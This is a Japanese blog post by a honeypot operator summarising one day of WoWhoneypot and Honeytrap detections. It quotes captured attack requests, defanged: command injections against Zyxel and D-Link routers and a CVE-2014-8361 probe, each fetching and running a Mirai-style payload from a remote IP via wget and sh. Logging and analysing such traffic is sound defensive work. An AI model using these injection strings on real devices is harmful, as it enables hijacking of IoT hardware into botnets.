現在、 WoWhoneypotやHoneytrapを運用していますが、アウトプットする
機会がなかったため、ブログで色々と情報発信出来ればと思い、
始めて見ました。

WoWhoneypotやHoneytrapなどの低対話型のハニーポットについては以前に資料を
作成しましたので、そちらを見てもらえればと思います。

speakerdeck.com

Honeytrapの検知数が多く、まだ解析用の基盤が準備できていないので、
各ポートのペイロード分析やアクセス先のパス情報などは
後々やっていこうと考えています。

それまでは個人的に気になった点を書いていきます。

8/8 (水) の分析結果

1.Honeytrapで検知した攻撃

合計で 7078 件の検知がありましたが、ここでは件数が多かった
上位10件をピックアップします。

SMBやTELNET、SSH、などの狙われやすいポート以外に、D-LinkやAsteriskの
ポートへのアクセスが多かったです。
5038 ポートへのアクセスはデータサイズが 0byteであったため、
調査行為の通信と思われます。
ポート 52869 への通信は CVE-2014-8361 の脆弱性を狙ったもので
/picsdesc.xml へのPOST メソッドおよび wget  コマンドで以下の
ファイルをダウンロードします。
wget http[:]//192[.]184[.]93[.]244/salvia[.]mips
→ IoT製品を狙ったmirai系のマルウェアと推測

2.WoWhoneypotで検知した攻撃

36件のアクセス内、D-linkの脆弱性とZyxel製ルータの脆弱性を観測しました。

Zyxel製ルータの脆弱性
GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca ; cd /tmp;wget http[:]//178[.]128[.]11[.]199/rvs -O /tmp/rz;chmod 777 /tmp/rz;sh /tmp/rz HTTP/1.0
→VirusTotal

D-linkの脆弱性
GET /login.cgi?cli=aa aa';wget http[:]//185[.]172[.]164[.]41/e -O -> /tmp/hk;sh /tmp/hk'$ HTTP/1.1s
→VirusTotal

いずれもアクセス自体はすで出来ませんでしたが、恐れく IoT製品を狙った
mirai系のマルウェアと思われます。

 
なるべく、更新できるように頑張っていきます。